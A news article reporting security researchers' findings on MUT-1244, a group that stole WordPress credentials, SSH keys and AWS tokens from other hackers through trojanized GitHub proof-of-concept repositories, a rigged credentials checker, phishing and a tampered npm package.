A cybercriminal group MUT-1244 has stolen over 390,000 WordPress credentials in a massive, year-long operation targeting other hackers using a rigged WordPress credentials checker.
According to researchers at Datadog Security Labs, the attackers didn’t stop at stealing login details. They also snagged SSH private keys and AWS access tokens from hundreds of victims. These victims include malicious actors, penetration testers, red teamers, and security researchers.
The attackers used a sneaky multi-layered approach to infect their targets. They lured victims through trojanized GitHub repositories filled with fake proof-of-concept (PoC) exploits for known vulnerabilities. They also ran phishing campaigns that tricked users into downloading a fake “kernel upgrade,” disguised as a CPU microcode update.
The phishing emails convinced users to execute malicious commands, while the fake GitHub repositories targeted those searching for exploit code. The repositories looked authentic enough to fool even seasoned professionals by mimicking legitimate sources.
“Several of these repositories were automatically included in legitimate feeds, like Feedly Threat Intelligence or Vulnmon, which made them appear even more credible,” the researchers explained.
The attackers employed various methods to deliver their payloads. They hid malicious code in backdoored configuration files, embedded malware in PDFs, created Python-based droppers, and slipped malicious npm packages into project dependencies.
Interestingly, this campaign aligns with a previous attack detailed in a Checkmarx report from November. That attack involved a GitHub project, “hpc20235/yawp,” which used a tampered npm package, “0xengine/xmlrpc,” to steal sensitive data and mine Monero cryptocurrency.
The malware deployed by MUT-1244 included a backdoor and a cryptocurrency miner. These tools allowed them to exfiltrate sensitive information such as SSH keys, AWS credentials, and environment variables. The stolen data was then sent to platforms like Dropbox and file.io, with the malware containing hardcoded credentials to ensure easy access for the attackers.
How It All Worked
The attackers managed to gain access to the WordPress credentials through their rigged tool, “yawpp,” marketed as a credentials checker. They likely obtained these credentials from underground markets and used yawpp to validate them. Ironically, the very tool used by other threat actors to verify stolen logins became the method of their own compromise.
MUT-1244 exploited the trust within the cybersecurity community, infecting machines belonging to both ethical hackers and malicious actors. Once the malware was executed, it led to extensive data theft, including SSH keys, AWS tokens, and even command histories.
Datadog researchers believe this campaign is still ongoing, with hundreds of systems remaining compromised and new infections continuing to surface.
